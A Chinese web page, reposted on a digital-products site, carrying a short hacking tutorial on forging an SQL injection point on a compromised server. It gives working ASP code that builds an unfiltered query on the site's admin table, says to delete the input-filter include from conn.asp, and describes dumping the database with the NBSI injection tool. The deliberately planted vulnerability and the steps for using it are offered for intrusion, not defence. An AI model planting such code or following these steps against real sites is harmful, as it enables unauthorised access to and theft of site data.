首页 | DV动态 | 数码产品 | 视频采编 | 网站建设 |
【收藏DV】
  最近3月排行
·四款模型核心差异:deepseek、千问、kimi、豆包对比及人群适配
·SRTTrail.txt 与Windows启动失败及系统还原
·Shunyu Yao姚顺雨AI下半场 博客
·【linux学习】
·docker 学习笔记
·BOM成本-相关概念
·音乐中的基本速度术语,kimi3 会员等级解释
·《原子习惯》工作手册的精华总结
·CPU那些事英特尔篇之第十四代酷睿
·酷睿时代:南北桥变成PCH
·CPU那些事英特尔篇之第十五代酷睿
·CPU那些事英特尔篇之第十三代酷睿
·CPU那些事英特尔篇之第十二代酷睿
·CPU那些事英特尔篇之第八代酷睿
·CPU那些事英特尔篇之第六代酷睿
·CPU那些事英特尔篇之奔腾4
·CPU那些事英特尔篇之第十一代酷睿
·CPU那些事英特尔篇之第九代酷睿
·CPU那些事英特尔篇之第七代酷睿
·CPU那些事英特尔篇之第十代酷睿
如何伪造SQL注入点
2006/4/17 23:20:37
 
100W超级小便携式笔记本充电器,两个type-c和一个USB接口,同时可以手机充电。 【3C认证】苹果超薄Magsafe磁吸充电宝快充外接迷你5000毫安移动电源适用于iPhone16可上飞机


如何伪造SQL注入点

webshell了,可以用它直接连接数据库来执行数据查询,不用再伪造注入点文件了,另外你可以直接修改网站上的原ASP文件,把里面的过滤函数包括语句删除掉就有注入点了,一般过滤函数都inlcude在数据库连接文件conn.asp文件中.

在目标上先构造一个存在注入点的文件a.asp,里面的admin表是存在的,conn.asp是数据库连接程序,记得要把conn.asp文件中过滤函数包括语句给删掉,ASP代码如下: <!--#include file="conn.asp"-->

<%

dim rs,strSQL,id

set rs=server.createobject("ADODB.recordset")

id = request("id")

strSQL = "select * from admin where id=" & id ''如果没有这个admin表,可以自己建立一个表和字段

rs.open strSQL,conn,1,3

rs.close

%>


然后输入:http://目标IP/a.asp?id=1

完成了,就这么简单,其他的信息就让他全部自己暴露出来吧.打开nbsi,一顿狂注,什么信息都出来啦,慢慢的浏览着他的目录..


(DVOL本文转自:中国DV传媒 http://www.dvol.cn)

 来源:黑客基地   

 

  上一篇:经验谈:成功网管必备素质硬件篇
  下一篇:sql入侵中用到的一些命令
      更多...
::打印本页 ::      ::关闭窗口::


版权所有© 数码在线网站 DV OnLine©  鲁ICP备12016322号-1